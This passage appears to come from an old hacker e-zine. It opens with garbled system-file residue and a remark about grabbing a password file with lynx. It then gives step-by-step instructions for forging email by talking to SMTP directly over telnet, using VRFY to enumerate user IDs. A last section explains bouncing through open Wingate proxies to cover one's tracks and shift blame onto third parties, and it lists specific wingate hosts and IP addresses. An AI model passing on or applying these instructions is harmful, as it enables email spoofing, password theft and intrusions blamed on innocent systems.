vold.confD.sysIDtool.stateE defaultdomainFnodenameG
hostname.hme0.obp_devicesJinitpipe.old.35Wpath_to_inst.oldK.mnttab.loc
If you use lynx you will be able to grab the .passwd file.
(12)------------SECURITY--------------------------------------(12)
[Mail Forge]-------------------------------------| optiklenz |
I wrote about this years ago, and decided to revise.
This exploits smtp (port numeric value 25) allowing you to forge email
from a remote host.
Unix/Linux Users Use:
$ open url.host.net
Windows Users Use:
c:\windows\telnet <--
Enter url.host.net as the host to connect to, and 25 as the port.
After connected:
220 url.host.net ESMTP Sendmail 8.8.5/SCO5 ready at Label,
day month/day/year
3 -0400 (EDT)
If it prompts with a "It's always polite to "helo" command
mail rctp to user@domain.net | Varibles |
next [ helo = call send]
mail rcpt from fake@faked.net [ rcpt = recipient]
[vrfy = verify ]
vrfy comes in to process if things don't seem to be going right
For verify it is good to know uid's of people who use the system
your forging from. use: vrfy uid (user id)
Then type "Data", and press enter
The first thing you'll type in is a title. Next is the body msg.
Both should be on seperate lines. once finished type --> a . <--
then type quit, and press enter.
(13)------------SECURITY--------------------------------------(13)
[Wingate]-------------------------------------| optiklenz |
Short preface on wingating vault purposes. One is able to use
an exploit in cetain systems to bounce from one host to another.
A wingate can be used for system benifiet or system downfall. One
way it can be used is as a firewall to protect from outside attacks
on your host. Another use is bouncing from one host to another to
cover your tracks. This will put the fault on the system you wingated
from.
Unix/Linux Usage:
$ telnet wingate.net
Windows Usage:
Run a telnet client and connect to a wingate address via port 23
Once prompted with " Wingate: " you then enter the location
you wan't to bounce to. If using the wingate method to test your
systems logging it is good to bounce from more then 1 wingate at a
time.
Using Wingate as a socks host on IRC:
Linux Use: /server <wingate>:23 /quote <irc server>:6667
Windows use: Enter wingate location in your irc client's
"FIREWALL/SOCKS HOST" query.
[Some Wingates For your Proxy Pleasure]
ns2.thesocket.com
formfill.com
207.96.173.116
207.96.173.109
207.96.173.119
207.96.173.144
(14)------------SECURITY--------------------------------------(14)